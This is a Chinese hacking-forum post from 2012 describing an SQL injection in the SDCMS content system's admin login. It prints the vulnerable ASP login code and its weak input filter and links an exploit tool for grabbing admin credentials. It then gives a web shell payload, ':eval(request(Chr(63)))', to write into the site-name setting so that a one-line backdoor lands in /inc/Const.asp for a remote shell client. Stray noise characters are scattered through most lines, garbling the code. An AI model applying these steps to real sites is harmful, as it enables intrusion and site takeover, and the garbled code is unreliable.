作者:T00LS 鬼哥
: j% l5 _5 {2 Q漏洞文件:后台目录/index.asp
8 F3 O: F% |' `8 D, k. d+ M$ ~/ D
Sub Check# C; N7 p1 p4 O/ T
Dim username,password,code,getcode,Rs+ v/ [# S7 J) h# r( v
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub( f. @1 e6 |" q- `$ }
username=FilterText(Trim(Request.Form("username")),1)/ T9 k' R: Z, c9 N4 y4 K( S* {6 U
password=FilterText(Trim(Request.Form("password")),1)& ?9 j Z+ s- c6 L, `, ]7 K) v
code=Trim(Request.Form("yzm"))/ U+ Z* m% U6 k6 Q" e, _2 V6 {
getcode=Session("SDCMSCode")
1 E; ]3 H6 ^( B6 k- W" ~, W IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
U* S8 L8 z4 } IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied1 N, o% _7 r9 z5 ?: x
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
1 [+ X5 V% B, v/ s5 H/ u r IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied6 j/ j V, E2 _, C
IF username="" or password="" Then
. O. e e& @: |: C1 _1 V Echo "用户名或密码不能为空"ied
9 a2 e$ s$ `. L Else
/ D( W% I) [7 m Y" Q% m7 l1 u: C, I Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
# v4 ^# n. e/ j IF Rs.Eof Then
$ E; z: [' b, T$ o0 V3 o5 `* P) \ AddLog username,GetIp,"登录失败",1
+ r3 N* `9 ]6 X3 P; @& E) z0 s Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"& Q& O( |' |; _1 f
Else8 s* k# s" @0 D0 s8 W" f2 S5 o3 q$ f0 o
Add_Cookies "sdcms_id",Rs(0)# Y- r. k, ]' |( S7 m
Add_Cookies "sdcms_name",username! A7 X4 V5 g- q# U+ R, l
Add_Cookies "sdcms_pwd",Rs(2)) I+ R1 A9 a! C2 ]
Add_Cookies "sdcms_admin",Rs(3)2 p. A; C7 a4 ?: x" `
Add_Cookies "sdcms_alllever",Rs(4)* U& Y, y$ X0 I
Add_Cookies "sdcms_infolever",Rs(5)# D) u- D: v. n) g3 g, B2 w- c
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")2 G+ S* T4 [# Q5 L" ^
AddLog username,GetIp,"登录成功",1/ n0 X7 G. H/ t; l
'自动删除30天前的Log记录* x- n# H0 D/ T; F1 y. E2 Y
IF Sdcms_DataType Then8 G n, m) \0 V" |8 e
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
1 V* S. S9 u: N2 I& M t* q Else
# s3 p% ?1 d5 W; F8 G3 ~4 y Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
/ Y. w, U3 d1 A, v: y9 u End IF1 w7 `8 A0 }2 q, P! v
Go("sdcms_index.asp")7 E( L8 T2 T0 x. k( B- z
End IF5 t4 a' F' T0 j7 z, N
Rs.Close/ L: R* p/ X3 R' q
Set Rs=Nothing
$ Q0 F, I# R X; c End IF, _9 a5 M, ?5 O9 S2 D, w: q
End Sub
; V, N# Z% x. ?9 L$ {4 x% }4 \) {4 D- P0 O
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码$ T; e F% a7 D9 ?
0 X' G2 Y+ d/ ]" O/ \
Function FilterText(ByVal t0,ByVal t1)7 w, S6 ?1 W1 k
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
4 c6 c; t6 g' o: ] t0=Trim(t0)
$ g# o& c- W3 C$ F3 x Select Case t1# @4 W3 u* n) `" t0 f/ P& k* Y
Case "1" w5 Y3 C; Y$ H- `9 I/ l
t0=Replace(t0,Chr(32),"")
" f! S+ J$ H5 L7 S t0=Replace(t0,Chr(13),"")3 a5 h7 u) U; @
t0=Replace(t0,Chr(10)&Chr(10),"")* m$ s; m5 k6 ~3 |) ]. b1 @6 K
t0=Replace(t0,Chr(10),"")
9 }+ B3 u* ]2 Y% b Case "2"7 ^/ y& a$ A- f [# X9 b& N
t0=Replace(t0,Chr(8),"")'回格+ `+ j) g- q% {; b
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
( c# v- z( ?* g/ f, W. x t0=Replace(t0,Chr(10),"")'换行
7 e/ v6 d2 Q* r t0=Replace(t0,Chr(11),"")'tab(垂直制表符)1 ~& `0 Y; _0 j* Z$ Z5 p1 _
t0=Replace(t0,Chr(12),"")'换页
- E. `, ~# Z9 A2 |2 {0 l t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合# T% ~! F9 f* N. j- o5 A
t0=Replace(t0,Chr(22),"")7 [5 e* O. G0 k% I
t0=Replace(t0,Chr(32),"")'空格 SPACE! w2 _' L4 g+ u5 z* g
t0=Replace(t0,Chr(33),"")'!7 W& f5 v+ C' u4 u1 K1 z; m, r
t0=Replace(t0,Chr(34),"")'"+ h3 F% x) p& J [# M4 ]; e. |
t0=Replace(t0,Chr(35),"")'#
: f( p7 f+ e8 { t0=Replace(t0,Chr(36),"")'$
! w6 b2 E- G; b1 J% ? t0=Replace(t0,Chr(37),"")'%
9 \+ R! b; b4 a3 `0 R' R' M t0=Replace(t0,Chr(38),"")'&
. r3 L5 y4 P% c( G+ j' U+ L t0=Replace(t0,Chr(39),"")''
$ w5 F$ e3 {9 C t0=Replace(t0,Chr(40),"")'(
/ ~! O9 d* ^$ M* O8 Z" Y9 A t0=Replace(t0,Chr(41),"")')
( D/ u1 D( N/ A$ u1 r t0=Replace(t0,Chr(42),"")'*3 J) s9 o8 g* b1 I) v
t0=Replace(t0,Chr(43),"")'+/ g5 r# u# e2 c3 d* g) ~
t0=Replace(t0,Chr(44),"")',8 O$ i1 E9 M* v' V" T
t0=Replace(t0,Chr(45),"")'-
" N$ Z. b3 A. `7 ^' q0 t" e t0=Replace(t0,Chr(46),"")'./ }+ ^- c v! T% H; I
t0=Replace(t0,Chr(47),"")'/3 r4 V; t- l* m5 z- g& T
t0=Replace(t0,Chr(58),"")':4 [6 n! z w5 |" }' {# {
t0=Replace(t0,Chr(59),"")';
2 R, Y) J: }% b7 M. r0 P t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>% C: d; U: ?2 N
t0=Replace(t0,Chr(63),"")'?) w0 L3 n( A. x7 G
t0=Replace(t0,Chr(64),"")'@
2 a* N* m4 t8 a! _& R) r# |% C t0=Replace(t0,Chr(91),"")'\2 G" p9 Z" }' D& v m! L# q6 a
t0=Replace(t0,Chr(92),"")'\% ^ @% o5 {; S
t0=Replace(t0,Chr(93),"")']6 w7 A* R# a6 ]6 ^5 X
t0=Replace(t0,Chr(94),"")'^6 _: G# T' D1 o" I
t0=Replace(t0,Chr(95),"")'_2 X$ n6 [" v+ s% S) f
t0=Replace(t0,Chr(96),"")'`
8 k, B& x w+ T2 k t0=Replace(t0,Chr(123),"")'{
) T2 V/ B- i! A. @4 K! E. ?+ o t0=Replace(t0,Chr(124),"")'|+ p- g" r" U$ ?5 p/ l$ l
t0=Replace(t0,Chr(125),"")'}5 r! y- V$ w" @+ s1 [- J
t0=Replace(t0,Chr(126),"")'~# z$ w8 Q1 d; k, S1 b- r1 p8 y. t
Case Else
- ?- t5 d `6 u( W. o t0=Replace(t0, "&", "&")
$ S+ _/ Q9 R1 S1 T: D+ R$ B t0=Replace(t0, "'", "'"), V) Y4 |! k7 |6 q* H
t0=Replace(t0, """", """)
! O; p2 \ ^- r9 Z t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")+ [5 p- Y9 l, {8 n+ m
End Select1 J# K/ l0 L% e' p
IF Instr(Lcase(t0),"expression")>0 Then' G$ K0 k& F& p% l% B( m% [
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
- I( x6 N/ H! K6 Y- j% o End If; f& ^ i+ H. @' [% o/ k q
FilterText=t0; H, N/ e! M* X3 v
End Function
+ w* y- d6 x( ^+ z( Q* b! \3 T: B( v8 e/ h% r/ ?
看到没。直接参数是1 只过滤5 O* S( a4 j( z. W2 S
t0=Replace(t0,Chr(32)," ")
* k% ?( j; k. x0 w: @7 B$ ]7 e4 { t0=Replace(t0,Chr(13),"")
" m: k) B9 C5 W* l& E( B% W) {3 ` t0=Replace(t0,Chr(10)&Chr(10),"
, @; c- }7 x! G; v")
$ ^ f6 r4 ~% w, i& p+ a t0=Replace(t0,Chr(10),"
3 P. n# C4 k: O/ X. V4 y")6 J9 T& x" v4 X1 z( q
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!: G/ b2 {) d8 r. x
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
) I) |( e$ a5 A7 X3 d
; @3 m6 J- e3 v+ B( l! N测试:
, g- J. Q5 j: q$ \4 I! l, J
) z3 V/ b, L7 J( V& {/ N* g
* t5 s# J, _) P, |* O) { t现在输入工具上验证码,然后点OK
! F1 k* \; |& f* i) a* f$ ^- k& H, p5 V J8 N" l; C1 A. V
# y* F% a7 i f) y
看到我们直接进入后台管理界面了,呵呵!: K9 o0 u o* U7 s) h7 {
1 X# m3 N# s2 b/ M
5 u2 H$ u/ p, W- f0 b& K8 F3 i: ~0 Y# `: n; X8 U* h
这样直接进入后台了。。。。
/ ?5 j. P. c7 K3 \, }% g
( `8 C \; i( C, W/ W5 d# W& \- e# i! R, E
$ o/ u7 v0 }- J6 P3 ~. L ~, W6 [3 H+ I( |: J5 s
SDCMS提权:# Z) t7 s3 _5 g1 [" D
! M; `+ K i$ L方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?7 s+ {8 f( n5 ^' Q6 h6 Q2 X9 Q
6 n2 j) Q- W+ P, S( s$ [4 N. x0 e: g
3 O$ O8 p; T4 d5 z7 O
; V, c! D1 w: tOK,现在用菜刀连接下!& f1 _) i( @' a3 r' _! V! `/ }
' u8 R2 F6 i/ @" @& _, W8 Z2 X
* C0 q1 ?/ Y: C4 E- h* g
/ s4 J( ~4 @/ g7 V. ?/ ^5 W
8 Z- t; W. U. J/ @/ x, R* f; ^
/ g3 n, I7 _6 y; h' V |
发表于 2012-11-9 20:57:02
收藏
支持
反对